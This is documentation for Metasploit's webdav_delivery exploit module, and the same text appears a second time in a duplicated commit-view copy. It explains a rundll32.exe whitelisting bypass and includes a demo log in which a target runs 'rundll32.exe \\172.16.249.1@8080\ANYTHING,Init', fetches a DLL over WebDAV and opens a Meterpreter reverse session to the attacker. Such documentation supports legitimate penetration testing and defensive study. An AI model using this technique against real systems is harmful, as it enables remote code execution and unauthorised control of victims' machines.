metasploit-framework/documentation/modules/exploit/windows/misc/webdav_delivery.md

# Introduction

This module simplifies the rundll32.exe Application Whitelisting Bypass technique

The module creates a webdav server that hosts a dll file. When the user types the provided
rundll32 command on a system, rundll32 will load the dll remotly and execute the provided
export function.

The export function needs to be valid, but the default meterpreter function can be anything.
The process does write the dll to `C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV`
but does not load the dll from that location. This file should be removed after execution.

The extension can be anything you'd like, but you don't have to use one. Two files will be
written to disk. One named the requested name and one with a dll extension attached.

Please note that there is a slight delay for the target to start making WebDAV requests,
and then getting a session back.

# Demo

```
msf5 exploit(windows/misc/webdav_delivery) > run
[*] Exploit running as background job 3.

[*] Started reverse TCP handler on 172.16.249.1:4444 
msf5 exploit(windows/misc/webdav_delivery) > [*] Using URL: http://172.16.249.1:8080/
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\172.16.249.1@8080\ANYTHING,Init
[*] 172.16.249.130   webdav_delivery - GET /ANYTHING
[*] Sending stage (180291 bytes) to 172.16.249.130
[*] Meterpreter session 4 opened (172.16.249.1:4444 -> 172.16.249.130:49219) at 2018-12-12 13:25:06 -0600

msf5 exploit(windows/misc/webdav_delivery) > sessions

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  4         meterpreter x86/windows               172.16.249.1:4444 -> 172.16.249.130:49219 (172.16.249.130)

msf5 exploit(windows/misc/webdav_delivery) >
```
Land #10429, Add webdav delivery module 2018-12-12 19:31:37 +00:00			`# Introduction`

			`This module simplifies the rundll32.exe Application Whitelisting Bypass technique`

			`The module creates a webdav server that hosts a dll file. When the user types the provided`
			`rundll32 command on a system, rundll32 will load the dll remotly and execute the provided`
			`export function.`

			`The export function needs to be valid, but the default meterpreter function can be anything.`
			The process does write the dll to `C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV`
			`but does not load the dll from that location. This file should be removed after execution.`

			`The extension can be anything you'd like, but you don't have to use one. Two files will be`
			`written to disk. One named the requested name and one with a dll extension attached.`

			`Please note that there is a slight delay for the target to start making WebDAV requests,`
			`and then getting a session back.`

			`# Demo`

			```
			`msf5 exploit(windows/misc/webdav_delivery) > run`
			`[*] Exploit running as background job 3.`

			`[*] Started reverse TCP handler on 172.16.249.1:4444`
			`msf5 exploit(windows/misc/webdav_delivery) > [*] Using URL: http://172.16.249.1:8080/`
			`[*] Server started.`
			`[*] Run the following command on the target machine:`
			`rundll32.exe \\172.16.249.1@8080\ANYTHING,Init`
			`[*] 172.16.249.130 webdav_delivery - GET /ANYTHING`
			`[*] Sending stage (180291 bytes) to 172.16.249.130`
			`[*] Meterpreter session 4 opened (172.16.249.1:4444 -> 172.16.249.130:49219) at 2018-12-12 13:25:06 -0600`

			`msf5 exploit(windows/misc/webdav_delivery) > sessions`

			`Active sessions`
			`===============`

			`Id Name Type Information Connection`
			`-- ---- ---- ----------- ----------`
			`4 meterpreter x86/windows 172.16.249.1:4444 -> 172.16.249.130:49219 (172.16.249.130)`

			`msf5 exploit(windows/misc/webdav_delivery) >`
			```